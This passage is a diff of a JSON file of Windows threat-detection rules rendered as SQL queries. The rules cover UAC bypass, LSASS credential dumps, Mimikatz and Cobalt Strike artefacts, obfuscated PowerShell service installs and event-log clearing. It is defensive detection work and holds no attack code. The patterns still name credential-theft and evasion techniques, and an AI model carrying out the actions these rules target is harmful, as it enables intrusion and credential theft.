'%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": "experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_dumpert.yml" + "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" }, { - "title": "Suspicious Startup Folder Persistence", - "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "title": "Invoke-Obfuscation VAR+ Launcher - Security", + "id": "dcf2db1f-f091-425b-a821-c05875b8925a", "status": "experimental", - "description": "Detects when a file with a suspicious extension is created in the startup folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate usage of some of the extensions mentioned in the rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_startup_folder_persistence.yml" + "filename": "win_security_invoke_obfuscation_var_services_security.yml" }, { - "title": "CVE-2021-44077 POC Default Dropped File", - "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "title": "Important Scheduled Task Deleted/Disabled", + "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", "status": "experimental", - "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "cve.2021.44077" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" + "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" }, { - "title": "WerFault LSASS Process Memory Dump", - "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", - "status": "experimental", - "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", + "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "status": "test", + "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\WerFault.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' OR TargetFilename LIKE '%lsass.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_werfault_dump.yml" + "filename": "win_security_dcom_iertutil_dll_hijack.yml" }, { - "title": "Windows Webshell Creation", - "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "title": "Password Protected ZIP File Opened (Email Attachment)", + "id": "571498c8-908e-40b4-910b-d2369159a3da", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate used of encrypted ZIP files" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + }, + { + "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", + "id": "cfeed607-6aa4-4bbd-9627-b637deb723c8", "status": "test", - "description": "Possible webshell file creation on a static web site", - "author": "Beyu Denis, oscd.community, Tim Shelton", + "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Legitimate administrator or developer creating legitimate executable files in a web application folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4720' AND SamAccountName LIKE '%$%' ESCAPE '\\') OR (EventID = '4781' AND NewTargetUserName LIKE '%$%' ESCAPE '\\')))" ], - "filename": "file_event_win_webshell_creation_detect.yml" + "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml" }, { - "title": "Suspicious Outlook Macro Created", - "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "title": "Malicious Service Installations", + "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", "tags": [ "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.t1003", + "car.2013-09-005", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_office_outlook_susp_macro_creation.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a 